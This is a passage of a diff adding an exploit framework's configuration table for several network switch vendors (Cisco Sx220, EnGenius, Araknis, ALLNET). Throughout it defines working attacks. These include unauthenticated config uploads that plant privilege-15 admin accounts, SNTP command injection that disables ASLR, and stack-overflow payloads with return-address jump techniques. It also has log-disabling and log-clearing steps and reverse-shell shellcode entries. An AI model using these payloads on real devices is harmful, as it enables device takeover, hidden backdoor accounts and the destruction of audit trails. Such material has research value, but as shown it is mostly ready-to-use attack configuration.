+						#'content':'Content-Type\n\nconfig-file-header\nusername "USERNAME" nopassword\n\n------', # Yep, working too
+						'add_uri':'/cgi-bin/httpuploadruncfg.cgi',
+						'del_query':'', 
+						'del_uri':'/cgi-bin/dispatcher.cgi?cmd=526&usrName=USERNAME',
+						'vulnerable': True,
+						'safe': True
+					}, 
+					'sntp': {
+						'description':'SNTP command injection (PoC: disable ASLR)',
+						'json':False,
+						'authenticated': True,
+						'enable_uri':'/cgi-bin/dispatcher.cgi',
+						'enable_query':'sntp_enable=1&cmd=548',
+						'status_uri':'/cgi/get.cgi?cmd=sys_timeSettings',
+						'inject_uri':'/cgi-bin/dispatcher.cgi',
+						'inject_query':'sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123&cmd=550',
+						'check_query':'sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123&cmd=550',
+						'delete_uri':'/cgi-bin/dispatcher.cgi',
+						'delete_query':'sntp_Server=+&sntp_Port=123&cmd=550',
+						'disable_uri':'/cgi-bin/dispatcher.cgi',
+						'disable_query':'sntp_enable=0&cmd=548',
+						'verify_uri':'/tmp/check',
+						'vulnerable': True,
+						'safe': True
+					},
+					#
+					# The stack overflow in 'username' and 'password' at same request are multipurpose.
+					#
+
+					#
+					# The trick to jump and execute:
+					# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]
+					# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary
+					# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)
+					# 4. We will also feed required function parameters, by adding them to '_CMD_'
+					#
+					'stack_cgi_diag': {
+						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
+						'authenticated': False,
+
+						'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
+						'content':'username='+ self.random_string(212) +'_JUMP_&password='+ self.random_string(180) +'&_CMD_&login=1',
+						'sys_ping_post_check':'',
+						'sys_ping_post_SIGSEGV': False,		# SIGSEGV ?
+
+						'workaround':True,	# My LAB workaround
+
+						'vulnerable': True,
+						'safe': True
+
+					},
+					'stack_cgi_log': {
+						'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
+						'authenticated': False,
+						'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
+						'content':'username='+ self.random_string(212) +'_JUMP_&password='+ self.random_string(180) +'_CMD_&login=1',
+
+						'log_settings_set_cmd':'&LOGGING_SERVICE=0',# Disable Logging CMD
+						'log_settings_set_SIGSEGV':False,			# Disable Logging SIGSEGV ?
+
+						'log_ramClear_cmd':'',						# Clean RAM log CMD
+						'log_ramClear_SIGSEGV':False,				# Clean RAM log SIGSEGV ?
+
+						'log_fileClear_cmd':'',						# Clean FILE log CMD
+						'log_fileClear_SIGSEGV':False,				# Clean FILE log SIGSEGV ?
+
+						'workaround':True,	# My LAB workaround
+						'verify_uri':'/tmp/check',
+						'vulnerable': True,
+						'safe': True
+					},
+					'stack_cgi_sntp': {
+						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
+						'authenticated': False,
+						'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
+						'content':'username='+ self.random_string(212) +'_JUMP_&password='+ self.random_string(180) +'_CMD_&login=1',
+
+						'sys_timeSntp_set_cmd':'&sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123',
+						'sys_timeSntp_set_check':'&sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123',
+
+						'sys_timeSntpDel_set_cmd':'&sntp_Server=+&sntp_Port=123',
+
+						'sys_timeSettings_set_cmd_enable':'&sntp_enable=1',
+						'sys_timeSettings_set_cmd_disable':'&sntp_enable=0',
+						'sys_timeSettings_set_SIGSEGV': False,		# SIGSEGV ?
+
+						'workaround':True,	# My LAB workaround
+						'verify_uri':'/tmp/check',
+						'vulnerable': True,
+						'safe': True
+					}, 
+
+					#
+					# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.
+					# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode
+					#
+					'heack_cgi_shell': {
+						'description':'Stack overflow in "username/password" (PoC: reverse shell)',
+						'authenticated': False,
+						'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',
+						'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',
+						'query':'username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&login=1',
+						'workaround':True,	# My LAB workaround
+						'stack':True, # False = use Heap, and there are no ASLR
+						'vulnerable': True,
+						'safe': True
+					},
+
+				},
+			},
+
+			'Cisco': { 
+				'vendor': 'Cisco Systems, Inc.',
+				'model':'Sx220',
+				'uri':'https://www.cisco.com/c/en/us/support/switches/small-business-220-series-smart-plus-switches/tsd-products-support-series-home.html',
+				'modulus_uri':'/cgi/get.cgi?cmd=home_login',
+				'info_leak':True,
+				'info_leak_JSON':True,
+				'info_leak_uri':'/cgi/get.cgi?cmd=home_login',
+				'xsid':True,
+				'xsid_uri':'/cgi/get.cgi?cmd=home_main',
+				'login': {
+					'description':'Login/Logout on remote device',
+					'authenticated': True,
+					'json':True,
+					'encryption':'rsa',
+					'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
+					'query':'{"_ds=1&username=USERNAME&password=PASSWORD&_de=1":{}}',
+					'status_uri':'/cgi/get.cgi?cmd=home_loginStatus',
+					'logout_uri':'/cgi/set.cgi?cmd=home_logout',
+					'vulnerable': True,
+					'safe': True
+				},
+				'log':{
+						'description':'Disable and clean logs',
+						'authenticated': True,
+						'json':True,
+						'disable_uri':'/cgi/set.cgi?cmd=log_settings',
+						'disable_query':'{"_ds=1&ram_sev_0=on&ram_sev_1=on&ram_sev_2=on&ram_sev_3=on&ram_sev_4=on&ram_sev_5=on&ram_sev_6=on&_de=1":{}}',
+						'status':'/cgi/get.cgi?cmd=log_settings',
+						'clean_logfile_uri':'/cgi/set.cgi?cmd=log_fileClear',
+						'clean_logfile_query':'{"":{}}',
+						'clean_logmem_uri':'/cgi/set.cgi?cmd=log_ramClear',
+						'clean_logmem_query':'{"":{}}',
+						'vulnerable': True,
+						'safe': True
+				},
+				# Verify lacking authentication
+				'verify': { 
+						'httpuploadbakcfg.cgi':{
+							'authenticated': False,
+							'response':'file',
+							'Content-Type':True,
+							'description':'Upload "backup-config" (PoC: Create invalid file to verify)',
+							'uri':'/cgi/httpuploadbakcfg.cgi',
+							'check_uri':'/tmp/startup-config',
+							'content':'/mnt/backup-config',
+							'content_check':'/mnt/backup-config',
+							'vulnerable': True,
+							'safe': True
+						},
+						'httpuploadlang.cgi':{
+							'authenticated': False,
+							'response':'html',
+							'Content-Type':True,
+							'description':'Upload/update "language" (PoC: Create invalid file to verify)',
+							'uri':'/cgi/httpuploadlang.cgi',
+							'check_uri':False,		# 
+							'content': self.random_string(30), # We checking returned 'errMsgLangMG' and LEN of this text
+							'content_check':'errMsgLangMG',	#
+							'vulnerable': True,
+							'safe': True
+						},
+						'httpuploadruncfg.cgi':{
+							'authenticated': False,
+							'response':'file',
+							'Content-Type':True,
+							'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
+							'uri':'/cgi/httpuploadruncfg.cgi',
+							'check_uri':'/tmp/http_saverun_cfg',
+							'content':'/var/config/running-config',
+							'content_check':'/var/config/running-config',
+							'vulnerable': True,
+							'safe': True
+						},
+						'httprestorecfg.cgi':{
+							'authenticated': False,
+							'response':'file',
+							'Content-Type':True,
+							'description':'Upload "startup-config" (PoC: Create invalid file to verify)',
+							'uri':'/cgi/httprestorecfg.cgi',
+							'check_uri':'/tmp/startup-config',
+							'content':'/mnt/startup-config',
+							'content_check':'/mnt/startup-config',
+							'vulnerable': True,
+							'safe': True
+						},
+						'httpupload.cgi':{
+							'authenticated': False,
+							'response':'file',
+							'Content-Type':True,
+							'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
+							'uri':'/cgi-bin/httpupload.cgi',
+							'check_uri':'/tmp/http_uploadfail',
+							'content':'Copy: Illegal software format', # Not the real content, its the result of invalid firmware (workaround)
+							'content_check':'Copy: Illegal software format',
+							'vulnerable': True,
+							'safe': True
+						},
+						'login.cgi': {
+							'description':'Stack overflow in login.cgi (PoC: create file /tmp/VUL.TXT)',
+							'authenticated': False,
+							'response':'file',
+							'Content-Type':False,
+							'uri':'/cgi/set.cgi?cmd=home_loginAuth',
+							'check_uri':'/tmp/VUL.TXT', # We cannot control the content...
+							'content':'{"_ds=1&username='+ self.random_string(32) +'&password=/tmp/VUL.TXT&_de=1":{}}',
+							'content_check':'2',
+							'vulnerable': True,
+							'safe': True
+						},
+						'set.cgi': { # 'username' also suffer from stack overflow
+							'description':'Stack overflow in "username/password" (PoC: crash CGI)',
+							'authenticated': False,
+							'response':'502',
+							'Content-Type':False,
+							'uri':'/cgi/set.cgi?cmd=home_loginAuth',
+							'content':'{"_ds=1&username=admin&password=' + self.random_string(312) + '&_de=1":{}}',
+							'check_uri':False,
+							'content_check':False,
+							'vulnerable': True,
+							'safe': True
+						},
+				},
+				'exploit': {
+					'heack_hydra_shell': {
+						'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
+						'authenticated': False,
+						'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory
+						'vulnerable': True,
+						'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart
+					},
+					'priv15_account': {
+						'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
+						'authenticated': False,
+						'json':True,
+						'encryption':'md5',
+						'content':'Content-Type\n\nconfig-file-header\nusername "USERNAME" secret encrypted PASSWORD\n\n------',
+						#'encryption':'nopassword',
+						#'content':'Content-Type\n\nconfig-file-header\nusername "USERNAME" nopassword\n\n------', # Yep, working too
+						'add_uri':'/cgi/httpuploadruncfg.cgi',
+						'del_query':'{"_ds=1&user=USERNAME&_de=1":{}}',
+						'del_uri':'/cgi/set.cgi?cmd=aaa_userDel',
+						'vulnerable': True,
+						'safe': True
+					}, 
+					'sntp': {
+						'description':'SNTP command injection (PoC: disable ASLR)',
+						'json':True,
+						'authenticated': True,
+						'enable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',
+						'enable_query':'{"_ds=1&sntpStatus=1&_de=1":{}}',
+						'status_uri':'/cgi/get.cgi?cmd=sys_timeSettings',
+						'inject_uri':'/cgi/set.cgi?cmd=sys_timeSntp',
+						'inject_query':'{"_ds=1&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123&_de=1":{}}',
+						'check_query':'{"_ds=1&srvDef=byIp&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123&_de=1":{}}',
+						'delete_uri':'/cgi/set.cgi?cmd=sys_timeSntpDel',
+						'delete_query':'{"":{}}',
+						'disable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',
+						'disable_query':'{"_ds=1&sntpStatus=0&_de=1":{}}',
+						'verify_uri':'/tmp/check',
+						'vulnerable': True,
+						'safe': True
+					},
+					#
+					# The stack overflow in 'username' and 'password' at same request are multipurpose.
+					#
+
+					#
+					# The trick to jump and execute:
+					# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]
+					# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary
+					# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)
+					# 4. We will also feed required function parameters, by adding them to '_CMD_'
+					#
+					'stack_cgi_diag': {
+						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
+						'authenticated': False,
+
+						'uri':'/cgi/set.cgi?cmd=home_loginAuth',
+						'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
+						'sys_ping_post_SIGSEGV': True,		# SIGSEGV ?
+
+						'workaround':False,	# My LAB workaround
+						'vulnerable': True,
+						'safe': True
+
+					},
+					'stack_cgi_log': {
+						'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
+						'authenticated': False,
+						'uri':'/cgi/set.cgi?cmd=home_loginAuth',
+						'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
+
+						'log_settings_set_cmd':'',					# Disable Logging CMD
+						'log_settings_set_SIGSEGV':True,			# Disable Logging SIGSEGV ?
+
+						'log_ramClear_cmd':'',						# Clean RAM CMD
+						'log_ramClear_SIGSEGV':True,				# Clean RAM SIGSEGV ?
+
+						'log_fileClear_cmd':'',						# Clean FILE log CMD
+						'log_fileClear_SIGSEGV':True,				# Clean FILE log SIGSEGV ?
+
+						'workaround':False,	# My LAB workaround
+						'verify_uri':'',
+						'vulnerable': True,
+						'safe': True
+					},
+					'stack_cgi_sntp': {
+						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
+						'authenticated': False,
+						'uri':'/cgi/set.cgi?cmd=home_loginAuth',
+						'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
+						'sys_timeSntp_set_cmd':'&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123',
+						'sys_timeSntp_set_check':'&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123',
+
+						'sys_timeSntpDel_set_cmd':'&sntpServer=+&cursntpPort=123',				# CMD
+
+						'sys_timeSettings_set_cmd_enable':'&sntpStatus=1',	# Enable CMD
+						'sys_timeSettings_set_cmd_disable':'&sntpStatus=0',	# Disable CMD
+						'sys_timeSettings_set_SIGSEGV': True,		# SIGSEGV ?
+
+						'workaround':False,	# My LAB workaround
+						'verify_uri':'/tmp/check',
+						'vulnerable': True,
+						'safe': True
+					}, 
+					#
+					# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.
+					# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode
+					#
+					'heack_cgi_shell': {
+						'description':'Stack overflow in "username/password" (PoC: reverse shell)',
+						'authenticated': False,
+						'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
+						'logout_uri':'/cgi/set.cgi?cmd=home_logout',
+						'query':'{"_ds=1&username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&_de=1":{}}',
+						'stack':True, # False = use Heap, and there are no ASLR
+						'workaround':False,	# My LAB workaround
+						'vulnerable': True,
+						'safe': True
+					},
+
+				},
+			},
+
+			'EnGenius': { 
+				'vendor': 'EnGenius Technologies, Inc.',
+				'modulus_uri':'',
+				'info_leak':True,
+				'info_leak_JSON':False,
+				'info_leak_uri':'/loginMsg.js',
+				'xsid':False,
+				'xsid_uri':'',
+				'login': {
+					'description':'Login/Logout on remote device',
+					'authenticated': True,
+					'json':True,
+					'encryption':'',
+					'login_uri':'',
+					'query':'',
+					'status_uri':'',
+					'logout_uri':'',
+					'vulnerable': False,
+					'safe': True
+				},
+				'login': {
+					'description':'Login/Logout on remote device',
+					'authenticated': True,
+					'json':True,
+					'encryption':'',
+					'login_uri':'',
+					'query':'',
+					'status_uri':'',
+					'logout_uri':'',
+					'vulnerable': False,
+					'safe': True
+				},
+				'log':{
+						'description':'Disable and clean logs',
+						'authenticated': True,
+						'json':True,
+						'disable_uri':'',
+						'disable_query':'',
+						'status':'',
+						'clean_logfile_uri':'',
+						'clean_logfile_query':'',
+						'clean_logmem_uri':'',
+						'clean_logmem_query':'',
+						'vulnerable': False,
+						'safe': True
+				},
+				# Verify lacking authentication
+				'verify': { 
+						'security.cgi': { # 'username' also suffer from stack overflow
+							'description':'Stack overflow in "username/password" (PoC: crash CGI)',
+							'authenticated': False,
+							'response':'502',
+							'Content-Type':False,
+							'uri':'/cgi-bin/security.cgi?login',
+							'content':'usr=admin&pswrd=' + self.random_string(280),
+							'check_uri':False,
+							'content_check':False,
+							'vulnerable': True,
+							'safe': True
+						},
+						'datajson.cgi': { # 'username' also suffer from stack overflow
+							'description':'Stack overflow in "username/password" (PoC: crash CGI)',
+							'authenticated': False,
+							'response':'502',
+							'Content-Type':False,
+							'uri':'/cgi-bin/datajson.cgi?login',
+							'content':'usr=admin&pswrd=' + self.random_string(288),
+							'check_uri':False,
+							'content_check':False,
+							'vulnerable': True,
+							'safe': True
+						},
+				},
+				'exploit': {
+					'heack_hydra_shell': {
+						'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
+						'authenticated': False,
+						'uri':'/cgi-bin/sn_httpupload.cgi?', # Including alignment of opcodes in memory
+						'vulnerable': True,
+						'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart
+					},
+					'priv15_account': {
+						'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
+						'authenticated': False,
+						'json':True,
+						'encryption':'',
+						'content':'',
+						'add_uri':'',
+						'del_query':'',
+						'del_uri':'',
+						'vulnerable': False,
+						'safe': True
+					}, 
+					'sntp': {
+						'description':'SNTP command injection (PoC: disable ASLR)',
+						'json':True,
+						'authenticated': True,	# <================================
+						'enable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',
+						'enable_query':'{"_ds=1&sntpStatus=1&_de=1":{}}',
+						'status_uri':'/cgi/get.cgi?cmd=sys_timeSettings',
+						'inject_uri':'/cgi/set.cgi?cmd=sys_timeSntp',
+						'inject_query':'{"_ds=1&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123&_de=1":{}}',
+						'check_query':'{"_ds=1&srvDef=byIp&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123&_de=1":{}}',
+						'delete_uri':'/cgi/set.cgi?cmd=sys_timeSntpDel',
+						'delete_query':'{"":{}}',
+						'disable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',
+						'disable_query':'{"_ds=1&sntpStatus=0&_de=1":{}}',
+						'verify_uri':'/tmp/check',
+						'vulnerable': False, # It is vulnerable, but I am not using this authenticated code here :>
+						'safe': True
+					},
+					#
+					# The stack overflow in 'username' and 'password' at same request are multipurpose.
+					#
+
+					#
+					# The trick to jump and execute:
+					# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]
+					# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary
+					# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)
+					# 4. We will also feed required function parameters, by adding them to '_CMD_'
+					#
+					# Bonus: Disable and clean logs
+					#
+					#
+					'stack_cgi_add_account': {
+						'description':'Stack overflow in "username/password" (PoC: add priv 15 credentials)',
+						'authenticated': False,
+						'uri':'/cgi-bin/datajson.cgi?login',
+						'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
+
+						'workaround':False,	# My LAB workaround
+						'vulnerable': True,
+						'safe': True
+					},
+					'stack_cgi_del_account': {
+						'description':'Stack overflow in "username/password" (PoC: del priv 15 credentials)',
+						'authenticated': False,
+						'uri':'/cgi-bin/datajson.cgi?login',
+						'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
+
+						'workaround':False,	# My LAB workaround
+						'vulnerable': True,
+						'safe': True
+					},
+					'stack_cgi_diag': {
+						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
+						'authenticated': False,
+
+						'uri':'/cgi-bin/datajson.cgi?login',
+						'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
+						'sys_ping_post_SIGSEGV': True,		# SIGSEGV ?
+
+						'workaround':False,	# My LAB workaround
+						'vulnerable': True,
+						'safe': True
+
+					},
+					'stack_cgi_log': {
+						'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
+						'authenticated': False,
+						'uri':'/cgi-bin/datajson.cgi?login',
+						'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
+
+						'log_settings_set_cmd':'&en=0',				# Disable Logging CMD
+						'log_settings_set_SIGSEGV':True,			# Disable Logging SIGSEGV ?
+
+						'log_ramClear_cmd':'&ta=0',					# Clean RAM CMD
+						'log_ramClear_SIGSEGV':True,				# Clean RAM SIGSEGV ?
+
+						'log_fileClear_cmd':'&ta=1',				# Clean FILE log CMD
+						'log_fileClear_SIGSEGV':True,				# Clean FILE log SIGSEGV ?
+
+						'workaround':False,	# My LAB workaround
+						'verify_uri':'',
+						'vulnerable': True,
+						'safe': True
+					},
+					'stack_cgi_sntp': {
+						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
+						'authenticated': False,
+						'uri':'/cgi-bin/datajson.cgi?login',
+						'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
+
+						'sys_timeSntp_set_cmd':'&sa=`echo 0 > /proc/sys/kernel/randomize_va_space`&sp=123',
+						'sys_timeSntp_set_check':'&sa=`cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check`&sp=123',
+
+						'sys_timeSntpDel_set_cmd':'&sa=+&sp=123',				# CMD
+
+						'sys_timeSettings_set_cmd_enable':'&sn=1',	# Enable CMD
+						'sys_timeSettings_set_cmd_disable':'&sn=0',	# Disable CMD
+						'sys_timeSettings_set_SIGSEGV': True,		# SIGSEGV ?
+
+						'workaround':False,	# My LAB workaround
+						'verify_uri':'/conf_tmp/check',
+						'vulnerable': True,
+						'safe': True
+					}, 
+					#
+					# Used for both 'heap' and 'stack'
+					#
+					'heack_cgi_shell': {
+						'description':'Stack overflow in "username/password" (PoC: reverse shell)',
+						'authenticated': False,
+						'login_uri':'/cgi-bin/security.cgi?login',
+						'logout_uri':'/cgi-bin/security.cgi?logout',
+						'query':'build=NOP&heap=NOP&to=NOP&higher=addresses&usr=admin&pswrd=_PWDNOP_RA_START&shellcode=_USRNOP_SHELLCODE',
+						#'stack':False, # False = use Heap, and there are no ASLR
+						'workaround':False,	# My LAB workaround
+						'vulnerable': True,
+						'safe': True
+					},
+
+				},
+			},
+
+			'Araknis': { 
+				'vendor': 'Araknis Networks',
+				'modulus_uri':'',
+				'info_leak':True,
+				'info_leak_JSON':False,
+				'info_leak_uri':'/loginMsg.js',
+				'xsid':False,
+				'xsid_uri':'',
+				'login': {
+					'description':'Login/Logout on remote device',
+					'authenticated': True,
+					'json':True,
+					'encryption':'',
+					'login_uri':'',
+					'query':'',
+					'status_uri':'',
+					'logout_uri':'',
+					'vulnerable': False,
+					'safe': True
+				},
+				'login': {
+					'description':'Login/Logout on remote device',
+					'authenticated': True,
+					'json':True,
+					'encryption':'',
+					'login_uri':'',
+					'query':'',
+					'status_uri':'',
+					'logout_uri':'',
+					'vulnerable': False,
+					'safe': True
+				},
+				'log':{
+						'description':'Disable and clean logs',
+						'authenticated': True,
+						'json':True,
+						'disable_uri':'',
+						'disable_query':'',
+						'status':'',
+						'clean_logfile_uri':'',
+						'clean_logfile_query':'',
+						'clean_logmem_uri':'',
+						'clean_logmem_query':'',
+						'vulnerable': False,
+						'safe': True
+				},
+				# Verify lacking authentication
+				'verify': { 
+						'security.cgi': { # 'username' also suffer from stack overflow
+							'description':'Stack overflow in "username/password" (PoC: crash CGI)',
+							'authenticated': False,
+							'response':'502',
+							'Content-Type':False,
+							'uri':'/cgi-bin/security.cgi?login',
+							'content':'usr=admin&pswrd=' + self.random_string(280),
+							'check_uri':False,
+							'content_check':False,
+							'vulnerable': True,
+							'safe': True
+						},
+						'datajson.cgi': { # 'username' also suffer from stack overflow
+							'description':'Stack overflow in "username/password" (PoC: crash CGI)',
+							'authenticated': False,
+							'response':'502',
+							'Content-Type':False,
+							'uri':'/cgi-bin/datajson.cgi?login',
+							'content':'usr=admin&pswrd=' + self.random_string(288),
+							'check_uri':False,
+							'content_check':False,
+							'vulnerable': True,
+							'safe': True
+						},
+				},
+				'exploit': {
+					'heack_hydra_shell': {
+						'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
+						'authenticated': False,
+						'uri':'/cgi-bin/sn_httpupload.cgi?', # Including alignment of opcodes in memory
+						'vulnerable': True,
+						'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart
+					},
+					'priv15_account': {
+						'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
+						'authenticated': False,
+						'json':True,
+						'encryption':'',
+						'content':'',
+						'add_uri':'',
+						'del_query':'',
+						'del_uri':'',
+						'vulnerable': False,
+						'safe': True
+					}, 
+					'sntp': {
+						'description':'SNTP command injection (PoC: disable ASLR)',
+						'json':True,
+						'authenticated': True,	# <================================
+						'enable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',
+						'enable_query':'{"_ds=1&sntpStatus=1&_de=1":{}}',
+						'status_uri':'/cgi/get.cgi?cmd=sys_timeSettings',
+						'inject_uri':'/cgi/set.cgi?cmd=sys_timeSntp',
+						'inject_query':'{"_ds=1&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123&_de=1":{}}',
+						'check_query':'{"_ds=1&srvDef=byIp&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123&_de=1":{}}',
+						'delete_uri':'/cgi/set.cgi?cmd=sys_timeSntpDel',
+						'delete_query':'{"":{}}',
+						'disable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',
+						'disable_query':'{"_ds=1&sntpStatus=0&_de=1":{}}',
+						'verify_uri':'/tmp/check',
+						'vulnerable': False, # It is vulnerable, but I am not using this authenticated code here :>
+						'safe': True
+					},
+					#
+					# The stack overflow in 'username' and 'password' at same request are multipurpose.
+					#
+
+					#
+					# The trick to jump and execute:
+					# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]
+					# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary
+					# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)
+					# 4. We will also feed required function parameters, by adding them to '_CMD_'
+					#
+					'stack_cgi_add_account': {
+						'description':'Stack overflow in "username/password" (PoC: add priv 15 credentials)',
+						'authenticated': False,
+						'uri':'/cgi-bin/datajson.cgi?login',
+						'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
+
+						'workaround':False,	# My LAB workaround
+						'vulnerable': True,
+						'safe': True
+					},
+					'stack_cgi_del_account': {
+						'description':'Stack overflow in "username/password" (PoC: del priv 15 credentials)',
+						'authenticated': False,
+						'uri':'/cgi-bin/datajson.cgi?login',
+						'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
+
+						'workaround':False,	# My LAB workaround
+						'vulnerable': True,
+						'safe': True
+					},
+					'stack_cgi_diag': {
+						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
+						'authenticated': False,
+
+						'uri':'/cgi-bin/datajson.cgi?login',
+						'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
+						'sys_ping_post_SIGSEGV': True,		# SIGSEGV ?
+
+						'workaround':False,	# My LAB workaround
+						'vulnerable': True,
+						'safe': True
+
+					},
+					'stack_cgi_log': {
+						'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
+						'authenticated': False,
+						'uri':'/cgi-bin/datajson.cgi?login',
+						'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
+
+						'log_settings_set_cmd':'&en=0',				# Disable Logging CMD
+						'log_settings_set_SIGSEGV':True,			# Disable Logging SIGSEGV ?
+
+						'log_ramClear_cmd':'&ta=0',					# Clean RAM CMD
+						'log_ramClear_SIGSEGV':True,				# Clean RAM SIGSEGV ?
+
+						'log_fileClear_cmd':'&ta=1',				# Clean FILE log CMD
+						'log_fileClear_SIGSEGV':True,				# Clean FILE log SIGSEGV ?
+
+						'workaround':False,	# My LAB workaround
+						'verify_uri':'',
+						'vulnerable': True,
+						'safe': True
+					},
+					'stack_cgi_sntp': {
+						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
+						'authenticated': False,
+						'uri':'/cgi-bin/datajson.cgi?login',
+						'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
+
+						'sys_timeSntp_set_cmd':'&sa=`echo 0 > /proc/sys/kernel/randomize_va_space`&sp=123',
+						'sys_timeSntp_set_check':'&sa=`cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check`&sp=123',
+
+						'sys_timeSntpDel_set_cmd':'&sa=+&sp=123',				# CMD
+
+						'sys_timeSettings_set_cmd_enable':'&sn=1',	# Enable CMD
+						'sys_timeSettings_set_cmd_disable':'&sn=0',	# Disable CMD
+						'sys_timeSettings_set_SIGSEGV': True,		# SIGSEGV ?
+
+						'workaround':False,	# My LAB workaround
+						'verify_uri':'/conf_tmp/check',
+						'vulnerable': True,
+						'safe': True
+					}, 
+					#
+					# Used for both 'heap' and 'stack'
+					#
+					'heack_cgi_shell': {
+						'description':'Stack overflow in "username/password" (PoC: reverse shell)',
+						'authenticated': False,
+						'login_uri':'/cgi-bin/security.cgi?login',
+						'logout_uri':'/cgi-bin/security.cgi?logout',
+						'query':'build=NOP&heap=NOP&to=NOP&higher=addresses&usr=admin&pswrd=_PWDNOP_RA_START&shellcode=_USRNOP_SHELLCODE',
+						'stack':False, # False = use Heap, and there are no ASLR
+						'workaround':False,	# My LAB workaround
+						'vulnerable': True,
+						'safe': True
+					},
+
+				},
+			},
+
+			'ALLNET_JSON': { 
+				'vendor': 'ALLNET GmbH Computersysteme',
+				'model':'ALL-SG82xx',
+				'uri':'https://www.allnet.de/',
+				'modulus_uri':'/cgi/get.cgi?cmd=home_login',
